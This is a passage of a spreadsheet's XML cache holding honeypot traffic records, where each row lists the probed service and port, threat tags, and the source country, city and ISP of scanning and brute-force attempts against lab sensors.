    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H39"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Janpath)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6296"/>
    <s v="77.2183"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="2008-03-19"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7838:6571"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1472"/>
    <x v="1472"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T15:41:37"/>
    <d v="2025-04-16T15:41:37"/>
    <d v="2025-04-16T15:41:37"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Brute Force"/>
    <s v="high"/>
    <s v="SMA-LAB_corporatelogin_Login.NIPPONINDIAIM_HC1"/>
    <s v="443"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TR"/>
    <s v="Turkey"/>
    <s v="34"/>
    <s v="Istanbul"/>
    <s v="Ümraniye"/>
    <s v="Ümraniye"/>
    <s v="10400338"/>
    <s v="NA"/>
    <s v="41.0022"/>
    <s v="29.0686"/>
    <s v="15924"/>
    <s v="BORUSANTELEKOM-AS"/>
    <s v="Borusan Telekom"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login"/>
    <s v="{HTTP_LOGIN:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c1f3:dc52"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="High"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1473"/>
    <x v="1473"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T15:39:45"/>
    <d v="2025-02-20T21:02:03"/>
    <d v="2025-04-16T15:39:45"/>
    <n v="19"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="medium"/>
    <s v="SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="1433&amp;&amp;445&amp;&amp;53001"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JT"/>
    <s v="Central Java"/>
    <s v="Karanganyar Regency"/>
    <s v="Karanganyar"/>
    <s v="1641315"/>
    <s v="NA"/>
    <s v="-7.59833"/>
    <s v="110.944"/>
    <s v="150924"/>
    <s v="PT Hepra Teknologi Indonesia"/>
    <s v="PT Hepra Teknologi Indonesia"/>
    <s v="business"/>
    <s v="Hepra"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.199.117.164,60694)}&amp;&amp;{Data_SMB:Incoming connection (103.199.117.164,61160)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;NA&amp;&amp;{Data_SMB:Incoming connection (103.199.117.164,58701)}&amp;&amp;{Data_SMB:Incoming connection (103.199.117.164,59403)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67c7:75a4"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1474"/>
    <x v="1474"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T15:13:58"/>
    <d v="2024-12-21T17:24:24"/>
    <d v="2025-04-16T15:13:58"/>
    <n v="39"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_HC1"/>
    <s v="1433&amp;&amp;3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="NA"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="45899"/>
    <s v="VNPT Corp"/>
    <s v="VNPT"/>
    <s v="business"/>
    <s v="Vietnam Posts and Telecommunications Group"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ef1:45d1"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1475"/>
    <x v="1475"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T15:10:36"/>
    <d v="2024-12-10T15:49:03"/>
    <d v="2025-04-16T15:10:36"/>
    <n v="93"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H28"/>
    <s v="23&amp;&amp;NA&amp;&amp;59700&amp;&amp;48882"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="12"/>
    <s v="Dnipropetrovsk"/>
    <s v="Nikopol Raion"/>
    <s v="Nikopol"/>
    <s v="700051"/>
    <s v="NA"/>
    <s v="47.5675"/>
    <s v="34.394800000000004"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="Golden Telecom LLC"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2e76:3ee7"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1476"/>
    <x v="1476"/>
    <s v="host-80-43-170-146.as13285.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-16T14:49:32"/>
    <d v="2025-04-15T06:42:30"/>
    <d v="2025-04-16T14:49:32"/>
    <n v="54"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H28"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="GB"/>
    <s v="United Kingdom"/>
    <s v="ENG"/>
    <s v="England"/>
    <s v="Salford"/>
    <s v="Salford"/>
    <s v="2638671"/>
    <s v="M5 3FU"/>
    <s v="53.4676"/>
    <s v="-2.27893"/>
    <s v="9105"/>
    <s v="TalkTalk Communications Limited"/>
    <s v="TalkTalk"/>
    <s v="business"/>
    <s v="TalkTalk Communications Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:502b:aa92"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1477"/>
    <x v="1477"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T14:25:37"/>
    <d v="2025-04-16T14:25:37"/>
    <d v="2025-04-16T14:25:37"/>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2:37ab"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1478"/>
    <x v="1478"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T14:25:30"/>
    <d v="2023-10-06T14:14:00"/>
    <d v="2025-04-16T14:25:30"/>
    <n v="1860"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H2"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;4741&amp;&amp;1433&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JK"/>
    <s v="Jakarta"/>
    <s v="Kota Administrasi Jakarta Pusat"/>
    <s v="Jakarta Pusat"/>
    <s v="6754874"/>
    <s v="NA"/>
    <s v="-6.18104"/>
    <s v="106.826"/>
    <s v="7713"/>
    <s v="Telekomunikasi Indonesia (PT)"/>
    <s v="PT. Telekomunikasi Indonesia"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (36.67.217.181,21161)}&amp;&amp;{Data_SMB:Incoming connection (36.67.217.181,21305)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (36.67.217.181,8687)}&amp;&amp;{Data_SMB:Incoming connection (36.67.217.181,45757)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2443:d9b5"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1479"/>
    <x v="1479"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T14:10:53"/>
    <d v="2025-04-15T20:38:33"/>
    <d v="2025-04-16T14:10:53"/>
    <n v="14"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="48"/>
    <s v="Mykolaiv"/>
    <s v="Voznesensk Raion"/>
    <s v="Pivdennoukrainsk"/>
    <s v="7525990"/>
    <s v="NA"/>
    <s v="47.8288"/>
    <s v="31.1751"/>
    <s v="39908"/>
    <s v="Daughter Company Television Systems KVANT of PrJSC Atomservice"/>
    <s v="Daughter Company Television Systems KVANT of PrJSC Atomservice"/>
    <s v="business"/>
    <s v="Daughter Company Television Systems KVANT of CJSC Atomservice"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c3bd:c569"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1480"/>
    <x v="1480"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T14:01:05"/>
    <d v="2025-04-16T14:01:05"/>
    <d v="2025-04-16T14:01:05"/>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rporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d3:86e3"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1481"/>
    <x v="1481"/>
    <s v="shef-18-b2-v4wan-166465-cust151.vm3.cable.virginm.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-16T13:50:01"/>
    <d v="2025-04-15T18:35:28"/>
    <d v="2025-04-16T13:50:01"/>
    <n v="30"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="GB"/>
    <s v="United Kingdom"/>
    <s v="ENG"/>
    <s v="England"/>
    <s v="Sheffield"/>
    <s v="Oughtibridge"/>
    <s v="2640832"/>
    <s v="NA"/>
    <s v="53.4361"/>
    <s v="-1.53902"/>
    <s v="5089"/>
    <s v="Virgin Media Limited"/>
    <s v="Virgin Media"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2007-03-07 12:22:23"/>
    <s v="2026-03-07 12:22:23"/>
    <s v="2025-02-06 07:29:04"/>
    <s v="['NS1.VIRGINMEDIA.NET', 'NS2.VIRGINMEDIA.NET', 'NS3.VIRGINMEDIA.NET', 'NS4.VIRGINMEDIA.NET']"/>
    <s v="ENOM, INC."/>
    <s v="['clientTransferProhibited https://icann.org/epp#clientTransferProhibited', 'clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited']"/>
    <s v="REDACTED FOR PRIVACY"/>
    <x v="26"/>
    <s v="NA"/>
    <s v="REDACTED FOR PRIVACY"/>
    <s v="::ffff:4d64:98"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1482"/>
    <x v="1482"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T13:36:42"/>
    <d v="2025-04-16T13:34:24"/>
    <d v="2025-04-16T13:36:42"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'cbl.abuseat.org': ['unknown']}"/>
    <n v="32"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JK"/>
    <s v="Jakarta"/>
    <s v="NA"/>
    <s v="Jakarta"/>
    <s v="1642911"/>
    <s v="NA"/>
    <s v="-6.21462"/>
    <s v="106.845"/>
    <s v="139955"/>
    <s v="PT DATA PRIMA SOLUSINDO"/>
    <s v="PT DATA PRIMA SOLUSINDO"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6793:5464"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1483"/>
    <x v="1483"/>
    <s v="114-34-243-178.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-16T13:35:03"/>
    <d v="2025-04-14T16:16:38"/>
    <d v="2025-04-16T13:35:03"/>
    <n v="20"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>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
    <s v="{Data_TELNET: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7222:f3b2"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1484"/>
    <x v="1484"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T13:29:41"/>
    <d v="2025-04-16T13:24:34"/>
    <d v="2025-04-16T13:29:41"/>
    <n v="10"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="OC"/>
    <s v="Oceania"/>
    <s v="AU"/>
    <s v="Australia"/>
    <s v="NSW"/>
    <s v="New South Wales"/>
    <s v="NA"/>
    <s v="Sydney"/>
    <s v="2147714"/>
    <s v="1001"/>
    <s v="-33.8688"/>
    <s v="151.209"/>
    <s v="1221"/>
    <s v="Telstra Limited"/>
    <s v="Telstra Internet"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7bd1:40f1"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1485"/>
    <x v="1485"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T13:16:18"/>
    <d v="2025-04-16T13:15:19"/>
    <d v="2025-04-16T13:16:18"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Palghar"/>
    <s v="Virār (Vasai West)"/>
    <s v="1253133"/>
    <s v="401305"/>
    <s v="19.3776"/>
    <s v="72.8179"/>
    <s v="138296"/>
    <s v="Juweriyah Networks Private Limited"/>
    <s v="ROA"/>
    <s v="residential"/>
    <s v="Amar Broadband Pvt Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6786:625"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1486"/>
    <x v="1486"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T13:13:38"/>
    <d v="2025-03-06T11:16:54"/>
    <d v="2025-04-16T13:13:38"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Gurugram"/>
    <s v="Gurugram (Sector 44)"/>
    <s v="1270642"/>
    <s v="NA"/>
    <s v="28.4498"/>
    <s v="77.0761"/>
    <s v="24186"/>
    <s v="RailTel Corporation of India Ltd."/>
    <s v="RailTel Corporation"/>
    <s v="business"/>
    <s v="RAILTEL"/>
    <s v="2015-11-10"/>
    <s v="RAILTEL-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ca8c:8309"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1487"/>
    <x v="1487"/>
    <s v="114-35-41-121.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-16T13:10:10"/>
    <d v="2024-04-17T09:57:31"/>
    <d v="2025-04-16T13:10:10"/>
    <n v="483"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H32"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;13876&amp;&amp;80&amp;&amp;41240&amp;&amp;23&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NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7223:2979"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1488"/>
    <x v="1488"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T13:08:35"/>
    <d v="2025-04-16T13:08:35"/>
    <d v="2025-04-16T13:08:35"/>
    <n v="1"/>
